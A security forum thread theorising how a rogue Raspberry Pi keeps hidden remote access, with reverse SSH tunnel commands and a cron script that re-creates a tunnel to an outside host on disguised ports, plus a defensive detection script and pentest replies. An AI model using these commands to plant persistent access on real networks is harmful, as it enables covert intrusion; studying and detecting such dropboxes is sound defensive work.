[Theory] A word on Pi and SSH

If you haven’t heard the news of NASA getting hacked via an authorized raspberry pi… you live under a rock, but anyways, this so-called hack got me thinking. How easy is it to actually keep a raspberry pi undetectable, both physically and software-wise?

A few quick google searches and messing around on my rpi gave results that I find slightly scary (just slightly). My theory of how the hack went down was quite simple in nature… set up the pi at an ethernet port that is out of the way and also by a power source. Have it set up with something like raspbian with the option to automatically log in as a certain user, so we have access to SSH, which is enabled as a system service (launches upon boot). SSH should be running on a common port (e.g. 80, 443, 43). It is set up as a remote SSH tunnel with certificates, and a cronjob checks every minute whether the tunnel needs to be created. On our system we then listen on the port that the tunnel was created on and as the user at localhost.

This is actually really simple in nature and not my own original content. If you search for ‘ssh reverse tunneling’ you will get a lot of articles on how to do this. The reason this is possible is SSH’s ability to locally port forward a port. The command in question is something along these lines:

ssh -R 8080:localhost:22 [email protected]

This is run on our pi or whatever. On our own laptop, we do something like this:

ssh -p 8080 [email protected]

So essentially, if the theory is correct, all you have to do is set up a bash script that tries to make the tunnel and have it be run every minute via a cronjob. Of course, if you want to do it from another network, you would have to port forward the port used. The bash script, which I cannot take credit for, is:

#!/usr/bin/env bash

# Open the reverse tunnel: port 8080 on the remote host is forwarded back to
# localhost:80 on this machine. -N opens no remote shell, only the tunnel;
# the StrictHostKeyChecking option skips the host-key prompt so the script
# can run unattended from cron.
createTunnel() {
    /usr/bin/ssh -o 'StrictHostKeyChecking no' -N -R 8080:localhost:80 [email protected]
}

# If no ssh client process is running, the tunnel is down, so recreate it.
# pidof exits non-zero when it finds no matching process.
if ! /bin/pidof ssh > /dev/null; then
    createTunnel
fi

Yeah I know. Really simple. Have a function that creates the tunnel and if the PID is 0, call that function.

Pretty much this proves how simple stuff can be:

  1. Overlooked
  2. Cause a huge security issue
  3. A bit of creativity can go a long way

The latter is what I find intriguing. Humans have the tendency to overthink certain things. They can patch all the ‘critical and obvious’ vulns, but something as simple as a Bad USB drop or someone walking through the front door and installing a pi is something I find overlooked quite a bit.

I know. Quick and dirty, but this was just me sharing a theory. The limit is limitless.

4 Likes
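From the defender's side, the tell-tale of the setup described above is an ssh client on an internal box holding a long-lived outbound session to an external host on a port like 80, 443 or 43. The script below is an added example, not part of the original post: it scans `ss -tnp`-style output (a constructed sample is embedded; the port list and private ranges are assumptions to tune locally) and flags exactly those sockets.

```shell
#!/usr/bin/env sh
# Added example: flag outbound ssh client sessions that use the "common port"
# trick (SSH on 80/443/43). Input lines follow the `ss -tnp` layout:
#   State Recv-Q Send-Q Local:Port Peer:Port Process
# The SAMPLE below is constructed for this example, not captured from a host.

SUSPECT_PORTS="80 443 43"   # assumed list: ports the post names; tune locally

# is_private ADDR -> exit 0 if ADDR is loopback or RFC 1918 (assumed ranges)
is_private() {
  case "$1" in
    127.*|10.*|192.168.*|172.1[6-9].*|172.2[0-9].*|172.3[01].*) return 0 ;;
    *) return 1 ;;
  esac
}

# flag_ssh_tunnels < ss-output : print one line per suspicious socket
flag_ssh_tunnels() {
  while read -r state _ _ laddr peer proc; do
    [ "$state" = "ESTAB" ] || continue            # established sockets only
    case "$proc" in *'"ssh"'*) ;; *) continue ;; esac   # owned by an ssh client
    peer_ip=${peer%:*}
    peer_port=${peer##*:}
    is_private "$peer_ip" && continue             # internal SSH use is normal
    for p in $SUSPECT_PORTS; do
      [ "$peer_port" = "$p" ] && echo "SUSPECT: $laddr -> $peer ($proc)"
    done
  done
}

# Constructed sample: one disguised tunnel, one normal internal SSH session,
# one browser connection on 443, and the local sshd listener.
SAMPLE='ESTAB 0 0 192.168.1.50:51234 203.0.113.10:443 users:(("ssh",pid=1234,fd=3))
ESTAB 0 0 192.168.1.50:51235 192.168.1.20:22 users:(("ssh",pid=1240,fd=3))
ESTAB 0 0 192.168.1.50:51236 198.51.100.7:443 users:(("firefox",pid=900,fd=50))
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=700,fd=3))'

# count_suspects -> number of flagged sockets in SAMPLE (expected: 1)
count_suspects() {
  printf '%s\n' "$SAMPLE" | flag_ssh_tunnels | wc -l | tr -d ' '
}

# Run against the sample when executed directly; on a live host pipe
# `ss -tnp` into flag_ssh_tunnels instead.
printf '%s\n' "$SAMPLE" | flag_ssh_tunnels
```

On a real host, run it from cron and feed `ss -tnp` in; the relay the post describes on the server side can also be refused there with `AllowTcpForwarding no` in sshd_config.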

We do this on our physical pentests. You can use a tool called autossh, which will create a persistent SSH connection back to a cloud server of your choosing. This is also how the reverse-SSH feature of Hak5’s LANTurtle works.

We used these as references when building ours:
https://www.vdalabs.com/2018/02/06/penetration-testing-dropboxes/

5 Likes

I read about autossh briefly, but will take a peek at the article you posted.
